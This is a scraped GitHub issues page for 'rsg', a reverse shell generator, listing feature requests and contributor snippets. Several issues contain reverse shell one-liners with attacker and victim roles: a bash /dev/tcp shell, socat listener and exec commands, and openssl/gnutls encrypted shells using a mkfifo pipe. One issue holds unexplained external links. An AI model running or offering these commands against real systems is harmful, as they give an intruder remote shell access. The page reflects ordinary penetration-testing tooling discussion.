rsg icon indicating copy to clipboard operation
rsg copied to clipboard

ReverShellGenerator - A tool to generate various ways to do a reverse shell

Results 12 rsg issues
Sort by recently updated
recently updated
newest added

Before it would be necessary to run ip address separately to get your ip address, i thought it would be easier to use the tool if it had a feature...

Hi, A few years ago I made a pull request adding some QoL features, including being able to give an interface to listen on (https://github.com/mthbernardes/rsg/pull/13). I didn't check again until...

i cannot see anything wrong with the code. https://uploadi.ng/:)/🚩πŸͺπŸ‘ŒπŸ© https://uploadi.ng/:)/πŸ₯ƒπŸ‘ΌπŸ’¬πŸ—Ώ https://cdn.upload.systems/uploads/KDhCAnaC.png https://cdn.upload.systems/uploads/KpnK7n9O.png

Moved the stabilized netcat listener to it's own conditional. Adding the option of 'ls' for listen stabilized. This fixes #23

Hello, Not sure where to contact you for this, but im having issues with rsg where when I finish the command and it asks to open up a listener automatically,...

Hi I'm using this, and it's really helpful, I thought of an idea that every one liner will get also a number and the user can select a number by...

Hey, you might want to update the interactive bash version to support stderr :) ```sh bash -i > /dev/tcp/127.0.0.1/12345 2>&1

Attacker: ``` certtool --generate-privkey --outfile gtlsserver.pem certtool --generate-self-signed --load-privkey gtlsserver.pem --outfile gtlsserver-cert.pem socat `tty`,raw,echo=0 openssl-listen:8080,reuseaddr,cert=server.pem,verify=0 ``` Victim (ignore first 32 lines): ``` rm -f /tmp/p ; mkfifo /tmp/p ; gnutls-cli...

Hello, one of my favourite tools for reverse shell is openssl - present on many *nix platforms. ``` Attacker: openssl req -x509 -sha256 -newkey rsa:4096 -keyout server.pem -out server.pem -days...

Far best option is to use socat for listening and hosting side: ``` attacker$ socat file:`tty`,raw,echo=0 tcp-listen:8080,fork victim$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080,forever & ```